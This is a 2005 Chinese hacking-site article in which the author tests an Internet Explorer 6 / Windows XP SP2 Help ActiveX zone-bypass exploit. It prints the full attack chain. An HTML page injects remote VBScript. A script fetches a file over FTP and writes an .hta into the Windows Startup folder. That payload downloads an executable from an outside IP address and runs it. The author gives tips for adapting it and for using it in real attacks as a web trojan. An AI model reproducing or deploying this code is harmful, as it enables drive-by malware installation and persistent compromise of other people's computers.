您的位置:标题:IE XP SP2 Remote Compromise漏洞测试手记
时间:2005-1-6 来源:不详 浏览数:次
_content>作者:无敌最寂寞[-273℃@EST]
来源:邪恶八进制 中国
几天前看了Microsoft Internet Explorer XP SP2 的一个漏洞,感觉挺有意思,于是就想测试一下。
漏洞资料大家可以在:2KC0C.html" target=_blank>http://www.securiteam.com/windowsntfocus/6B00O2KC0C.html 看一下。虽然是E文,但是也不太难懂。
这个漏洞利用了SP2众人皆知的Help ActiveX Control Related Topics Zone Security Bypass Vulnerability 和Help ActiveX Control
Related Topics Cross Site Scripting Vulnerability这几个漏洞(用中文我不能正确描述,只好采用原文了)。
影响系统:
* Microsoft Internet Explorer 6.0
* Microsoft Windows XP Pro SP2
* Microsoft Windows XP Home SP2
简单了解这些,我们可以开始测试了,首先新建一个testsp2.htm,内容如下:
<HTML>
<OBJECT id="localpage" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm">
<OBJECT id="inject" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value='command;javascript:execScript("document.write(\"<script language=\\\"vbscript\\\"
src=\\\"_blank>http://blog.eviloctal.com/superlone/test/writehta.txt\\\"\" +
String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
</OBJECT>
<script>
localpage.HHClick();
setTimeout("inject.HHClick()",100);
</script>
</HTML>
说明:
file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm这个就是XP sp2中代的帮助文档,为什么要选择这个文件呢?because it is
treated as the local zone and it doesn't have any script to mess us up.
其它的大家视情况来修改,咱们是测试因此就没必要弄那么华丽的页面了,如果要实战的话,恐怕得花点功夫好好打扮一下。上面关键语句是
:
src=\\\"_blank>http://blog.eviloctal.com/superlone/test/writehta.txt\\\"\",这是另一个文件的URL,大家测试的时候要改成自己的。
writehta.txt的内容如下:
Dim Conn, rs
Set Conn = CreateObject("ADODB.Connection")
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
"Dbq=ftp://xxxxx:xxxxx@218.4.xxx.xxx/test/;" & _
"Extensions=asc,csv,tab,txt;" & _
"Persist Security Info=False"
set rs =CreateObject("ADODB.recordset")
rs.Open "SELECT * from f00bar.txt", conn
rs.Save "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\Microsoft Office.hta", adPersistXML
rs.close
conn.close
window.close
大家看到这个与原文有点不一样,的确"Dbq=ftp://xxxxx:xxxxx@218.4.xxx.xxx/test/;"原文是"Dbq=http://www.malware.com;",但是我一开
始也是按照这种格式来的,可是老是提示"Internet 无法登录",抓包一开,原来登录的是21端口,而且默认是用匿名用户和密码访问的。我的
ftp不支持匿名用户访问,因此我就换了上面格式的地址。如果你去申请了一个免费的空间而且空间支持ftp的话你也应该换成下面的格式:
ftp://用户名:密码@地址
这个文件执行后会把f00bar.txt的内容写入到启动目录里的Microsoft Office.hta文件,而foobar.txt的内容如下:
"< script language=vbscript> crap = """
""": on error resume next: crap = """
""" : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""
""" : o.open ""GET"",""_blank>http://222.174.144.130/tools/test/test.exe"",False : crap="""
""" : o.send : crap="""
""" : set s = createobject(""adodb.stream"") : crap="""
""" : s.type=1 : crap="""
""" : s.open : crap="""
""" : s.write o.responseBody : crap="""
""" : s.savetofile ""C:\test.exe"",2 : crap="""
""" : Set ws = CreateObject(""WScript.Shell"") : crap="""
""" : ws.Run ""C:\test.exe"", 3, FALSE : crap="""
"""</script> crap="""
写入后下次启动就会自动去_blank>http://222.174.144.130/tools/test/test.exe下载test.exe文件,并保存到c盘根目录,然后运行它。之于这个文
件是什么,你自由发挥吧。
下面是我的测试,我是在winxp pro sp2上测试的,测试结果如下图:
会出现一个我们提前设置的一个按钮,同是会弹出一个帮助文档,过一会去启动目录里看看,如下图:
果然已经有了一个文档了。
这是我的测试结果,感觉这个漏洞作网页木马还是困难点,不过它的思路还是很不错的,尤其是writehta.txt这部分,我们可以把她扩展到其
它方面,这个还是留个大家去吧。
OK!测试完成了!
(责任编辑:笑虎)
其他文章
- 上一篇文章: X-pad留言本存在极大的安全问题!
- 下一篇文章: Wins MS04045漏洞的利用
最近更新
今日推荐
热点文章